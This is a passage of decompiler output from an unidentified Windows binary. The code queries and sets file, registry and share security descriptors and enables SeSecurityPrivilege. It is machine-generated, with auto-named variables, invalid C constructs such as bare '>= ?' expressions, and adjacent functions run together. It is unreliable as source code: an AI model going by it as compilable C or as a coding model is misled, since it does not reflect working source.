											__eflags =  *((intOrPtr*)(_t1639 + 0x14)) - 8;
											_t1401 = _t1639;
											if( *((intOrPtr*)(_t1639 + 0x14)) >= 8) {
												_t1401 =  *_t1639;
											}
											_t1425 = CreateFileW(_t1401, 0x20000, 0, 0, 3, 0x2200000, 0);
											__eflags = _t1425 - 0xffffffff;
											if(_t1425 == 0xffffffff) {
												L54:
												_t1316 = _v92;
												__eflags = _t1316;
												if(_t1316 != 0) {
													RegCloseKey(_t1316);
													_v92 = 0;
												}
												__eflags = _v69;
												if(_v69 != 0) {
													L65:
													__eflags = _v76.Revision;
													if(_v76.Revision != 0) {
														L67:
														_v84 = 0;
														MakeAbsoluteSD(_v76.Revision, 0,  &_v84, 0,  &_v108, 0,  &_v104, 0,  &_v100, 0,  &_v96);
														_t1425 = GetLastError;
														_t1323 = GetLastError();
														__eflags = _t1323 - 0x7a;
														if(_t1323 == 0x7a) {
															_t1324 =  *(_t1660 + 0xc);
															__eflags = _t1324;
															if(_t1324 != 0) {
																__eflags =  *((char*)(_t1660 + 0x38));
																if( *((char*)(_t1660 + 0x38)) != 0) {
																	E012D3434(_t1324);
																	_t1699 = _t1699 + 4;
																	 *(_t1660 + 0xc) = 0;
																	 *((char*)(_t1660 + 0x38)) = 0;
																}
															}
															_t1325 =  *(_t1660 + 4);
															__eflags = _t1325;
															if(_t1325 != 0) {
																__eflags =  *((char*)(_t1660 + 0x39));
																if( *((char*)(_t1660 + 0x39)) != 0) {
																	E012D3434(_t1325);
																	_t1699 = _t1699 + 4;
																	 *(_t1660 + 4) = 0;
																	 *((char*)(_t1660 + 0x39)) = 0;
																}
															}
															_t1326 =  *(_t1660 + 8);
															__eflags = _t1326;
															if(_t1326 != 0) {
																__eflags =  *((char*)(_t1660 + 0x3a));
																if( *((char*)(_t1660 + 0x3a)) != 0) {
																	E012D3434(_t1326);
																	_t1699 = _t1699 + 4;
																	 *(_t1660 + 8) = 0;
																	 *((char*)(_t1660 + 0x3a)) = 0;
																}
															}
															_t1327 =  *(_t1660 + 0x3c);
															__eflags = _t1327;
															if(_t1327 != 0) {
																E012D3434(_t1327);
																_t1699 = _t1699 + 4;
																 *(_t1660 + 0x3c) = 0;
															}
															_t1328 =  *(_t1660 + 0x40);
															__eflags = _t1328;
															if(_t1328 != 0) {
																E012D3434(_t1328);
																_t1699 = _t1699 + 4;
																 *(_t1660 + 0x40) = 0;
															}
															_t1425 = 0;
															_v56 = 0;
															_v52 = 0;
															_v124 = 0;
															_v48 = 0;
															_t1639 = 0;
															_v120 = 0;
															_v32 = 0;
															_v28 = 0;
															_v24 = 0;
															_v8 = 4;
															_push(_v84);
															 *(_t1660 + 0xc) = E012D4011();
															_t1699 = _t1699 + 4;
															_t1331 = _v108;
															 *((char*)(_t1660 + 0x38)) = 1;
															__eflags = _t1331;
															if(_t1331 != 0) {
																_push(_t1331);
																_t1379 = E012D4011();
																_t1699 = _t1699 + 4;
																 *(_t1660 + 4) = _t1379;
																 *((char*)(_t1660 + 0x39)) = 1;
															}
															_t1332 = _v104;
															__eflags = _t1332;
															if(_t1332 != 0) {
																_push(_t1332);
																_t1378 = E012D4011();
																_t1699 = _t1699 + 4;
																 *(_t1660 + 8) = _t1378;
																 *((char*)(_t1660 + 0x3a)) = 1;
															}
															_t1333 = _v100;
															__eflags = _t1333;
															if(_t1333 != 0) {
																_t1440 =  &_v56;
																L012A87D0(_t1425,  &_v56, _t1639, _t1660, _t1333,  &_v56);
																_t1425 = _v56;
																_v124 = _v48;
															}
															_t1334 = _v96;
															__eflags = _t1334;
															if(_t1334 != 0) {
																L012A87D0(_t1425,  &_v32, _t1639, _t1660, _t1334, _t1440);
																_t1639 = _v32;
																_v120 = _v24;
															}
															_v128 = MakeAbsoluteSD(_v76.Revision,  *(_t1660 + 0xc),  &_v84,  *(_t1660 + 4),  &_v108,  *(_t1660 + 8),  &_v104, _t1425,  &_v100, _t1639,  &_v96);
															_t1341 = IsValidSid;
															__eflags = _t1425;
															if(_t1425 != 0) {
																_t1364 = IsValidSid(_t1425);
																__eflags = _t1364;
																if(_t1364 != 0) {
																	_t1365 =  *(_t1660 + 0x3c);
																	__eflags = _t1365;
																	if(_t1365 != 0) {
																		E012D3434(_t1365);
																		_t1699 = _t1699 + 4;
																		 *(_t1660 + 0x3c) = 0;
																	}
																	_t1367 = IsValidSid(_t1425);
																	__eflags = _t1367;
																	if(_t1367 == 0) {
																		L98:
																		_t1368 = 0;
																		__eflags = 0;
																	} else {
																		_t1369 = GetLengthSid(_t1425);
																		_push(1);
																		_push(_t1369);
																		_v116 = _t1369;
																		_t1370 = E012D4006();
																		_t1699 = _t1699 + 8;
																		_v88 = _t1370;
																		__eflags = _t1370;
																		if(_t1370 == 0) {
																			goto L98;
																		} else {
																			_t1371 = CopySid(_v116, _t1370, _t1425);
																			__eflags = _t1371;
																			_t1368 = _v88;
																			if(_t1371 == 0) {
																				E012D3434(_t1368);
																				_t1699 = _t1699 + 4;
																				goto L98;
																			}
																		}
																	}
																	 *(_t1660 + 0x3c) = _t1368;
																}
																_t1341 = IsValidSid;
															}
															__eflags = _t1639;
															if(_t1639 != 0) {
																_t1354 =  *_t1341(_t1639);
																__eflags = _t1354;
																if(_t1354 != 0) {
																	_t1355 =  *(_t1660 + 0x40);
																	__eflags = _t1355;
																	if(_t1355 != 0) {
																		E012D3434(_t1355);
																		_t1699 = _t1699 + 4;
																		 *(_t1660 + 0x40) = 0;
																	}
																	_t1357 = IsValidSid(_t1639);
																	__eflags = _t1357;
																	if(_t1357 == 0) {
																		L109:
																		_t1358 = 0;
																		__eflags = 0;
																	} else {
																		_t1359 = GetLengthSid(_t1639);
																		_push(1);
																		_push(_t1359);
																		_v116 = _t1359;
																		_t1360 = E012D4006();
																		_t1699 = _t1699 + 8;
																		_v88 = _t1360;
																		__eflags = _t1360;
																		if(_t1360 == 0) {
																			goto L109;
																		} else {
																			_t1361 = CopySid(_v116, _t1360, _t1639);
																			__eflags = _t1361;
																			_t1358 = _v88;
																			if(_t1361 == 0) {
																				E012D3434(_t1358);
																				_t1699 = _t1699 + 4;
																				goto L109;
																			}
																		}
																	}
																	 *(_t1660 + 0x40) = _t1358;
																}
															}
															__eflags = _v77;
															_push(_v76.Revision);
															if(_v77 == 0) {
																E012D3434();
																_t1699 = _t1699 + 4;
															} else {
																LocalFree();
															}
															__eflags = _v128;
															_v76.Revision = 0;
															if(_v128 == 0) {
																L117:
																 *(_t1660 + 0x10) = GetLastError();
																_t1660 = 0x1b;
															} else {
																_t1352 = IsValidSecurityDescriptor( *(_t1660 + 0xc));
																__eflags = _t1352;
																if(_t1352 == 0) {
																	goto L117;
																} else {
																	_t1660 = _v112;
																}
															}
															__eflags = _t1639;
															if(_t1639 == 0) {
																L122:
																__eflags = _t1425;
																if(_t1425 == 0) {
																	goto L127;
																} else {
																	_t1344 = _t1425;
																	_t1565 = _v124 - _t1425;
																	__eflags = _t1565 - 0x1000;
																	if(_t1565 < 0x1000) {
																		L125:
																		_push(_t1565);
																		E012CAE27(_t1425);
																		_t1699 = _t1699 + 8;
																		goto L127;
																	} else {
																		_t1425 =  *(_t1425 - 4);
																		_t1445 = _t1565 + 0x23;
																		__eflags = _t1344 - _t1425 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L133;
																		} else {
																			goto L125;
																		}
																	}
																}
															} else {
																_t1348 = _t1639;
																_t1567 = _v120 - _t1639;
																__eflags = _t1567 - 0x1000;
																if(_t1567 < 0x1000) {
																	L121:
																	_push(_t1567);
																	E012CAE27(_t1639);
																	_t1699 = _t1699 + 8;
																	goto L122;
																} else {
																	_t1639 =  *(_t1639 - 4);
																	_t1445 = _t1567 + 0x23;
																	__eflags = _t1348 - _t1639 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L133;
																	} else {
																		goto L121;
																	}
																}
															}
														} else {
															 *(_t1660 + 0x10) = GetLastError();
															_t1660 = 0x1b;
															goto L127;
														}
													} else {
														_t1660 = 0;
														goto L127;
													}
												} else {
													L57:
													__eflags =  *((intOrPtr*)(_t1639 + 0x14)) - 8;
													if( *((intOrPtr*)(_t1639 + 0x14)) >= 8) {
														_t1639 =  *_t1639;
													}
													_t1386 =  &_v76;
													__imp__GetNamedSecurityInfoW(_t1639,  *(_t1660 + 0x2c), _a8, 0, 0, 0, 0, _t1386);
													 *(_t1660 + 0x10) = _t1386;
													__eflags = _t1386;
													if(_t1386 == 0) {
														_v77 = 1;
														goto L65;
													} else {
														_t1660 = 5;
														goto L127;
													}
												}
											} else {
												__eflags = _t1425;
												if(_t1425 == 0) {
													goto L54;
												} else {
													_t1440 = _t1425;
													_v88 = _t1440;
													L46:
													GetKernelObjectSecurity(_t1440, _a8,  &_v76, 0,  &_v84);
													_t1395 = _v84;
													__eflags = _t1395;
													if(_t1395 == 0) {
														L52:
														__eflags = _t1425;
														if(_t1425 != 0) {
															CloseHandle(_t1425);
														}
														goto L54;
													} else {
														_push(_t1395);
														_t1397 = E012D4011();
														_t1699 = _t1699 + 4;
														_v76.Revision = _t1397;
														__eflags = _t1397;
														if(_t1397 != 0) {
															_t1440 =  &_v84;
															_t1398 = GetKernelObjectSecurity(_v88, _a8, _t1397, _v84,  &_v84);
															__eflags = _t1398;
															if(_t1398 != 0) {
																_v69 = 1;
															} else {
																E012D3434(_v76.Revision);
																_t1699 = _t1699 + 4;
																_v76.Revision = 0;
																_v69 = 0;
															}
															goto L52;
														} else {
															 *(_t1660 + 0x10) = GetLastError();
															_t1660 = 0x2e;
															goto L127;
														}
													}
												}
											}
										}
									} else {
										_v76.Group = 0;
										_v52 = 0;
										_v48 = 7;
										_v76.Group = 0;
										E012A1EE0(_t1425,  &(_v76.Group), 0x20000, _t1639, _t1660, L"SeSecurityPrivilege", 0x13);
										_v8 = 1;
										_v44 = 0;
										_t1571 =  &_v44;
										_v28 = 0;
										_v24 = 7;
										_v44 = 0;
										E012A1EE0(_t1425, _t1571, 0x20000, _t1639, _t1660, 0x12f983c, 0);
										_push(1);
										_push(_t1571);
										_v8 = 2;
										_t1440 =  &_v44;
										_t1407 = L012A21B0(_t1425,  &_v44,  &(_v76.Group), _t1735);
										_t1699 = _t1699 + 8;
										_v8 = 1;
										_t1635 = _v24;
										__eflags = _t1407;
										_t1425 = _t1425 & 0xffffff00 | _t1407 != 0x00000000;
										__eflags = _t1635 - 8;
										if(_t1635 < 8) {
											L29:
											_v28 = 0;
											_v8 = 0;
											_t1636 = _v48;
											_v24 = 7;
											_v44 = 0;
											__eflags = _t1636 - 8;
											if(_t1636 < 8) {
												L33:
												__eflags = _t1425;
												if(_t1425 == 0) {
													_t1425 =  *(_t1660 + 0x2c);
													_t1574 = 0x1020000;
													goto L36;
												} else {
													_t1660 = 0xc;
													L127:
													_t1574 = _a32;
													__eflags = _t1574 - 8;
													if(_t1574 < 8) {
														L131:
														 *[fs:0x0] = _v16;
														_pop(_t1640);
														_pop(_t1661);
														_pop(_t1426);
														__eflags = _v20 ^ _t1685;
														return E012CAE19(_t1660, _t1426, _v20 ^ _t1685, _t1574, _t1640, _t1661);
													} else {
														_t1445 = _a12;
														_t1574 = 2 + _t1574 * 2;
														_t937 = _t1445;
														__eflags = _t1574 - 0x1000;
														if(_t1574 < 0x1000) {
															L130:
															_push(_t1574);
															E012CAE27(_t1445);
															goto L131;
														} else {
															_t1445 =  *(_t1445 - 4);
															_t1574 = _t1574 + 0x23;
															__eflags = _t937 - _t1445 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L133;
															} else {
																goto L130;
															}
														}
													}
												}
											} else {
												_t1440 = _v76.Group;
												_t1637 = 2 + _t1636 * 2;
												_t1409 = _t1440;
												__eflags = _t1637 - 0x1000;
												if(_t1637 < 0x1000) {
													L32:
													_push(_t1637);
													E012CAE27(_t1440);
													_t1699 = _t1699 + 8;
													goto L33;
												} else {
													_t1445 =  *(_t1440 - 4);
													_t1574 = _t1637 + 0x23;
													__eflags = _t1409 - _t1445 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L132;
													} else {
														goto L32;
													}
												}
											}
										} else {
											_t1440 = _v44;
											_t1638 = 2 + _t1635 * 2;
											_t1414 = _t1440;
											__eflags = _t1638 - 0x1000;
											if(_t1638 < 0x1000) {
												L28:
												_push(_t1638);
												E012CAE27(_t1440);
												_t1699 = _t1699 + 8;
												goto L29;
											} else {
												_t1445 =  *(_t1440 - 4);
												_t1574 = _t1638 + 0x23;
												__eflags = _t1414 - _t1445 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													L132:
													E012CF35F(_t1425, _t1445, _t1574, __eflags);
													L133:
													E012CF35F(_t1425, _t1445, _t1574, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t1685);
													_t1687 = _t1699;
													_push(0xffffffff);
													_push(0x12ec3f3);
													_push( *[fs:0x0]);
													_t1702 = _t1699 - 0xe4;
													_t943 =  *0x1309018; // 0xedd8d3b4
													_t944 = _t943 ^ _t1687;
													_v172 = _t944;
													_push(_t1425);
													_push(_t1660);
													_push(_t1639);
													_push(_t944);
													 *[fs:0x0] =  &_v168;
													_t1641 = _t1445;
													_t1662 = _v140;
													_v388 = _t1662;
													_v384 = _v136;
													_v160 = 0;
													_v292 = 0;
													_v380 = 0;
													_v376 = 0;
													_v276 = 0;
													_v272 = 7;
													_v292 = 0;
													_v268 = 0;
													_v252 = 0;
													_v248 = 7;
													_v268 = 0;
													_v244 = 0;
													_v228 = 0;
													_v224 = 7;
													_v244 = 0;
													_v344 = 0;
													_v364 = 0x12ffef0;
													_v360 = 0;
													_v356 = 0;
													_v352 = 0;
													_v348 = 0;
													_v328 = 0;
													_v324 = 7;
													_v344 = 0;
													_v320 = 0;
													_v316 = 0;
													_v312 =  *((intOrPtr*)(_t1641 + 0x34));
													_v308 = 0;
													_v306 = 0;
													_v304 = 0;
													_v300 = 0;
													_v160 = 6;
													__eflags = _v100;
													if(_v100 == 0) {
														L216:
														_t1663 = 3;
														goto L217;
													} else {
														_t1425 = _v0;
														__eflags = _t1425;
														if(_t1425 == 0) {
															goto L216;
														} else {
															__eflags = _t1425 - 0xb;
															if(_t1425 == 0xb) {
																goto L216;
															} else {
																_t958 = _a4;
																_t1459 = _t958 & 0x00000008;
																__eflags = _t1459;
																_v244 = _t1459;
																if(_t1459 == 0) {
																	L149:
																	__eflags = _a24;
																	if(_a24 != 0) {
																		L153:
																		__eflags = _t1425 - 1;
																		if(_t1425 != 1) {
																			__eflags = _t1425 - 4;
																			if(__eflags != 0) {
																				goto L158;
																			} else {
																				_push(0x40000);
																				_push(0);
																				_t1295 = L012B5990( *((intOrPtr*)(_t1641 + 0x34)), _t1574, __eflags, _t1735,  &_a32,  &_v228);
																				__eflags = _t1295;
																				if(_t1295 == 0) {
																					_t1558 = _v228;
																					_v232 = 0;
																					__eflags = _t1558;
																					if(_t1558 == 0) {
																						goto L158;
																					} else {
																						goto L168;
																					}
																				} else {
																					_v228 = 0;
																					goto L158;
																				}
																			}
																		} else {
																			__eflags = _a52 - 8;
																			_t1297 =  >=  ? _a32 :  &_a32;
																			_t1295 = CreateFileW( >=  ? _a32 :  &_a32, 0xc0000, 0, 0, 3, 0x2200000, 0);
																			_t1683 = _t1295;
																			_v232 = _t1683;
																			__eflags = _t1683 - 0xffffffff;
																			if(_t1683 == 0xffffffff) {
																				L157:
																				GetLastError();
																				_t1662 = _v240;
																				_v232 = 0;
																				goto L158;
																			} else {
																				__eflags = _t1683;
																				if(_t1683 == 0) {
																					goto L157;
																				} else {
																					_t1558 = _t1683;
																					_t1662 = _v240;
																					L168:
																					_t1574 = _a4;
																					__imp__SetSecurityInfo(_t1558, _t1425, _a4, _a16, _a20, _t1662, _v236);
																					 *(_t1641 + 0x10) = _t1295;
																					__eflags = _t1295;
																					if(_t1295 != 0) {
																						goto L158;
																					} else {
																						_t1663 = 0;
																						goto L212;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t958 - 1;
																		if(_t958 == 1) {
																			goto L153;
																		} else {
																			__eflags = _t958 - 2;
																			if(_t958 == 2) {
																				goto L153;
																			} else {
																				__eflags = _t958 - 3;
																				if(_t958 != 3) {
																					L158:
																					_t1574 = _a28;
																					_t1460 = _a4;
																					__eflags = _t1574;
																					if(_t1574 != 0) {
																						__eflags = _t1460 & 0x0000000c;
																						if((_t1460 & 0x0000000c) != 0) {
																							_t1721 = _t1702 - 0x18;
																							E012983B0(_t1721,  &_a32);
																							_t1284 = E012A2EE0(_t1425, _t1425,  &_v144, _t1641, _t1662, _t1735);
																							_t1702 = _t1721 + 0x18;
																							__eflags = _t1284;
																							if(_t1284 != 0) {
																								_t1702 = _t1702 - 0x18;
																								_t1286 = E012983B0(_t1702,  &_v144);
																								_push(_a4);
																								_push(_t1425);
																								L20();
																								 *(_t1641 + 0x10) = _v200;
																								__eflags = _t1286;
																								if(_t1286 != 0) {
																									_t1287 = _v204;
																									__eflags = _t1287;
																									if(_t1287 != 0) {
																										__eflags = _v160;
																										if(_v160 != 0) {
																											E012D3434(_t1287);
																											_t1702 = _t1702 + 4;
																											_v204 = 0;
																											_v160 = 0;
																										}
																									}
																									goto L173;
																								} else {
																									__eflags = _v204 - _t1286;
																									if(_v204 == _t1286) {
																										L173:
																										_t1288 = _v212;
																										__eflags = _t1288;
																										if(_t1288 != 0) {
																											__eflags = _v159;
																											if(_v159 != 0) {
																												E012D3434(_t1288);
																												_t1702 = _t1702 + 4;
																												_v212 = 0;
																												_v159 = 0;
																											}
																										}
																										_t1289 = _v208;
																										__eflags = _t1289;
																										if(_t1289 != 0) {
																											__eflags = _v158;
																											if(_v158 != 0) {
																												E012D3434(_t1289);
																												_t1702 = _t1702 + 4;
																												_v208 = 0;
																												_v158 = 0;
																											}
																										}
																										 *(_t1641 + 0x10) = 0;
																									}
																								}
																							}
																							_t1460 = _a4;
																							_t1574 = _a28;
																						}
																					}
																					_t959 =  *((intOrPtr*)(_t1641 + 0x34));
																					__eflags =  *((char*)(_t959 + 0x39));
																					if( *((char*)(_t959 + 0x39)) != 0) {
																						L188:
																						__eflags = _t1425 - 5;
																						if(_t1425 != 5) {
																							L206:
																							__eflags = _a52 - 8;
																							_t1574 = _a4;
																							_t961 =  >=  ? _a32 :  &_a32;
																							__imp__SetNamedSecurityInfoW(_t961, _t1425, _a4, _a16, _a20, _v240, _v236);
																							 *(_t1641 + 0x10) = _t961;
																							__eflags = _t961;
																							if(_t961 == 0) {
																								_t1663 = 0;
																								__eflags = _t1425 - 5;
																								if(_t1425 == 5) {
																									_t1462 =  *((intOrPtr*)(_t1641 + 0x34)) + 0x1c;
																									_v36 = 0;
																									__eflags = _v100 - 8;
																									_v32 = 0;
																									_t967 =  >=  ? _v120 :  &_v120;
																									__eflags = _v76.Revision - 8;
																									_v28 =  >=  ? _v120 :  &_v120;
																									_t969 =  >=  ? _v96 :  &_v96;
																									__eflags =  *((intOrPtr*)(_t1462 + 0x14)) - 8;
																									if( *((intOrPtr*)(_t1462 + 0x14)) >= 8) {
																										_t1462 =  *_t1462;
																									}
																									_t1574 =  &_v36;
																									__imp__NetShareSetInfo(_t1462, _t969, 1,  &_v36, 0);
																									_t1665 = _t969;
																									 *(_t1641 + 0x10) = _t1665;
																									asm("sbb esi, esi");
																									_t1663 =  ~_t1665 & 0x00000019;
																									__eflags =  ~_t1665 & 0x00000019;
																								}
																							} else {
																								_t1663 = 0x19;
																							}
																							goto L212;
																						} else {
																							_t971 =  *( *((intOrPtr*)(_t1641 + 0x34)) + 0x2c);
																							__eflags = _t971;
																							if(_t971 != 0) {
																								_t1575 = _t971 + 3;
																								_v76.Owner = 0;
																								_v56 = 0;
																								_v52 = 7;
																								__eflags = _a48 - _t1575;
																								if(__eflags < 0) {
																									goto L219;
																								} else {
																									_t1257 = _a48 - _t1575;
																									__eflags = _t1257 - 0xffffffff;
																									_t1538 =  <  ? _t1257 : _t1460 | 0xffffffff;
																									__eflags = _a52 - 8;
																									_t1259 =  >=  ? _a32 :  &_a32;
																									E012A1EE0(_t1425,  &(_v76.Owner), _t1575, _t1641, _t1662,  &(( >=  ? _a32 :  &_a32)[_t1575]),  <  ? _t1257 : _t1460 | 0xffffffff);
																									E012982B0(_t1425,  &_v96,  &(_v76.Owner));
																									_t1627 = _v52;
																									__eflags = _t1627 - 8;
																									if(_t1627 < 8) {
																										goto L196;
																									} else {
																										_t1548 = _v76.Owner;
																										_t1628 = 2 + _t1627 * 2;
																										_t1271 = _t1548;
																										__eflags = _t1628 - 0x1000;
																										if(_t1628 < 0x1000) {
																											L195:
																											_push(_t1628);
																											E012CAE27(_t1548);
																											goto L196;
																										} else {
																											_t1460 =  *(_t1548 - 4);
																											_t1575 = _t1628 + 0x23;
																											__eflags = _t1271 - _t1460 + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												goto L220;
																											} else {
																												goto L195;
																											}
																										}
																									}
																								}
																							} else {
																								__eflags = _a52 - 8;
																								_t1276 =  >=  ? _a32 :  &_a32;
																								E012A1EE0(_t1425,  &_v96, _t1574, _t1641, _t1662,  >=  ? _a32 :  &_a32, _a48);
																								L196:
																								_t1265 =  *((intOrPtr*)(_t1641 + 0x34)) + 0x1c;
																								_v220 = 0;
																								__eflags = _v76.Revision - 8;
																								_t1542 =  >=  ? _v96 :  &_v96;
																								__eflags =  *((intOrPtr*)(_t1265 + 0x14)) - 8;
																								if( *((intOrPtr*)(_t1265 + 0x14)) >= 8) {
																									_t1265 =  *_t1265;
																								}
																								_t1574 =  &_v220;
																								__imp__NetShareGetInfo(_t1265, _t1542, 1,  &_v220);
																								_t1682 = _t1265;
																								__eflags = _t1682;
																								if(_t1682 == 0) {
																									_t1574 =  *(_v220 + 8);
																									_t1544 =  *(_v220 + 8);
																									_v244 = _t1544 + 2;
																									do {
																										_t1269 =  *_t1544;
																										_t1544 = _t1544 + 2;
																										__eflags = _t1269;
																									} while (_t1269 != 0);
																									__eflags = _t1544 - _v244;
																									E012A1EE0(_t1425,  &_v120, _t1574, _t1641, _t1682, _t1574, _t1544 - _v244 >> 1);
																								}
																								_t1266 = _v220;
																								__eflags = _t1266;
																								if(_t1266 != 0) {
																									NetApiBufferFree(_t1266);
																								}
																								 *(_t1641 + 0x10) = _t1682;
																								__eflags = _t1682;
																								if(_t1682 == 0) {
																									goto L206;
																								} else {
																									_t1663 = 0x19;
																								}
																								goto L212;
																							}
																						}
																					} else {
																						_v220 = 0;
																						__eflags = _t1460 & 0x00000004;
																						if((_t1460 & 0x00000004) == 0) {
																							L185:
																							__eflags = _v244;
																							if(_v244 == 0) {
																								goto L188;
																							} else {
																								_t1278 = _v208;
																								__eflags = _t1278;
																								if(_t1278 == 0) {
																									goto L188;
																								} else {
																									_t1460 = _t1641;
																									_t1663 = E012C2EA0(_t1460, _v236, _a28, _t1278,  &_v220);
																									__eflags = _t1663;
																									if(_t1663 != 0) {
																										goto L212;
																									} else {
																										goto L188;
																									}
																								}
																							}
																						} else {
																							_t1280 = _v212;
																							__eflags = _t1280;
																							if(_t1280 == 0) {
																								goto L185;
																							} else {
																								_t1460 = _t1641;
																								_t1663 = E012C2EA0(_t1460, _t1662, _t1574, _t1280,  &_v220);
																								__eflags = _t1663;
																								if(_t1663 != 0) {
																									L212:
																									_t962 = _v232;
																									__eflags = _t962;
																									if(_t962 != 0) {
																										CloseHandle(_t962);
																									}
																									_t963 = _v228;
																									__eflags = _t963;
																									if(_t963 != 0) {
																										RegCloseKey(_t963);
																										_v228 = 0;
																									}
																									goto L217;
																								} else {
																									goto L185;
																								}
																							}
																						}
																					}
																				} else {
																					goto L153;
																				}
																			}
																		}
																	}
																} else {
																	_v76.Owner = 0;
																	_v56 = 0;
																	_v52 = 7;
																	_v76.Owner = 0;
																	E012A1EE0(_t1425,  &(_v76.Owner), _t1574, _t1641, _t1662, L"SeSecurityPrivilege", 0x13);
																	_v12 = 7;
																	_v48 = 0;
																	_t1560 =  &_v48;
																	_v32 = 0;
																	_v28 = 7;
																	_v48 = 0;
																	E012A1EE0(_t1425, _t1560, _t1574, _t1641, _t1662, 0x12f983c, 0);
																	_push(1);
																	_push(_t1560);
																	_v12 = 8;
																	_t1303 = L012A21B0(_t1425,  &_v48,  &(_v76.Owner), _t1735);
																	_t1702 = _t1702 + 8;
																	_v12 = 7;
																	_t1632 = _v28;
																	__eflags = _t1303;
																	_v221 = _t1303 != 0;
																	__eflags = _t1632 - 8;
																	if(_t1632 < 8) {
																		L142:
																		_v12 = 6;
																		_t1574 = _v52;
																		_v32 = 0;
																		_v28 = 7;
																		_v48 = 0;
																		__eflags = _t1574 - 8;
																		if(_t1574 < 8) {
																			L146:
																			__eflags = _v221;
																			if(_v221 == 0) {
																				_t958 = _a4;
																				goto L149;
																			} else {
																				_t1663 = 0xc;
																				L217:
																				E012BFC50(_t1425,  &_v216, _t1735);
																				E012A2150(_t1425,  &_v96, _t1735);
																				E012A2150(_t1425,  &_v120, _t1735);
																				E012A2150(_t1425,  &_v144, _t1735);
																				E012A2150(_t1425,  &_a32, _t1735);
																				E012C78A0( &_a16);
																				E012C78A0( &_a20);
																				 *[fs:0x0] = _v20;
																				_pop(_t1642);
																				_pop(_t1664);
																				_pop(_t1427);
																				__eflags = _v24 ^ _t1687;
																				return E012CAE19(_t1663, _t1427, _v24 ^ _t1687, _t1574, _t1642, _t1664);
																			}
																		} else {
																			_t1562 = _v76.Owner;
																			_t1574 = 2 + _t1574 * 2;
																			_t1305 = _t1562;
																			__eflags = _t1574 - 0x1000;
																			if(_t1574 < 0x1000) {
																				L145:
																				_push(_t1574);
																				E012CAE27(_t1562);
																				_t1702 = _t1702 + 8;
																				goto L146;
																			} else {
																				_t1460 =  *(_t1562 - 4);
																				_t1575 = _t1574 + 0x23;
																				__eflags = _t1305 - _t1460 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L218;
																				} else {
																					goto L145;
																				}
																			}
																		}
																	} else {
																		_t1563 = _v48;
																		_t1633 = 2 + _t1632 * 2;
																		_t1310 = _t1563;
																		__eflags = _t1633 - 0x1000;
																		if(_t1633 < 0x1000) {
																			L141:
																			_push(_t1633);
																			E012CAE27(_t1563);
																			_t1702 = _t1702 + 8;
																			goto L142;
																		} else {
																			_t1460 =  *(_t1563 - 4);
																			_t1575 = _t1633 + 0x23;
																			__eflags = _t1310 - _t1460 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				L218:
																				E012CF35F(_t1425, _t1460, _t1575, __eflags);
																				L219:
																				E012986E0(_t1460, __eflags);
																				L220:
																				E012CF35F(_t1425, _t1460, _t1575, __eflags);
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				_push(_t1687);
																				_t1689 = _t1702;
																				_push(0xffffffff);
																				_push(0x12ec43d);
																				_push( *[fs:0x0]);
																				_t1704 = _t1702 - 0x10;
																				_push(_t1425);
																				_push(_t1662);
																				_push(_t1641);
																				_t975 =  *0x1309018; // 0xedd8d3b4
																				_push(_t975 ^ _t1689);
																				 *[fs:0x0] =  &_v425;
																				_t1643 = _t1460;
																				_t1428 = _v401;
																				_t1667 = _v397;
																				_v417 = 2;
																				__eflags = _v369;
																				if(_v369 == 0) {
																					L238:
																					_t1668 = 3;
																				} else {
																					__eflags = _v4 - 0xb;
																					if(_v4 != 0xb) {
																						goto L238;
																					} else {
																						_t1238 = _a8;
																						_v28 = 0;
																						__eflags = _t1238;
																						if(_t1238 == 0) {
																							L226:
																							_t1239 = _a12;
																							__eflags = _t1239;
																							if(_t1239 == 0) {
																								L229:
																								__eflags = _t1428;
																								if(_t1428 == 0) {
																									L232:
																									__eflags = _t1667;
																									if(_t1667 == 0) {
																										L235:
																										MakeSelfRelativeSD( *(_t1643 + 0xc), 0,  &_v28);
																										_push(_v28);
																										_t1242 = E012D4011();
																										_t1704 = _t1704 + 4;
																										_v32 = _t1242;
																										_t1243 = MakeSelfRelativeSD( *(_t1643 + 0xc), _t1242,  &_v28);
																										__eflags = _t1243;
																										if(_t1243 != 0) {
																											_t1719 = _t1704 - 0x18;
																											E012983B0(_t1719,  &_a16);
																											_t1246 = E012C3AF0(_t1428,  &_v32, _v28, _t1643, _v28, __eflags);
																											_t1704 = _t1719 + 0x18;
																											_t1668 = _t1246;
																										} else {
																											 *((intOrPtr*)(_t1643 + 0x10)) = GetLastError();
																											_t1668 = 0x1b;
																										}
																									} else {
																										_t1248 = SetSecurityDescriptorSacl( *(_t1643 + 0xc), 1, _t1667, 0);
																										__eflags = _t1248;
																										if(_t1248 != 0) {
																											goto L235;
																										} else {
																											 *((intOrPtr*)(_t1643 + 0x10)) = GetLastError();
																											_t1668 = 0x19;
																										}
																									}
																								} else {
																									_t1250 = SetSecurityDescriptorDacl( *(_t1643 + 0xc), 1, _t1428, 0);
																									__eflags = _t1250;
																									if(_t1250 != 0) {
																										goto L232;
																									} else {
																										 *((intOrPtr*)(_t1643 + 0x10)) = GetLastError();
																										_t1668 = 0x19;
																									}
																								}
																							} else {
																								_t1252 = SetSecurityDescriptorGroup( *(_t1643 + 0xc), _t1239, 0);
																								__eflags = _t1252;
																								if(_t1252 != 0) {
																									goto L229;
																								} else {
																									 *((intOrPtr*)(_t1643 + 0x10)) = GetLastError();
																									_t1668 = 0x19;
																								}
																							}
																						} else {
																							_t1254 = SetSecurityDescriptorOwner( *(_t1643 + 0xc), _t1238, 0);
																							__eflags = _t1254;
																							if(_t1254 != 0) {
																								goto L226;
																							} else {
																								 *((intOrPtr*)(_t1643 + 0x10)) = GetLastError();
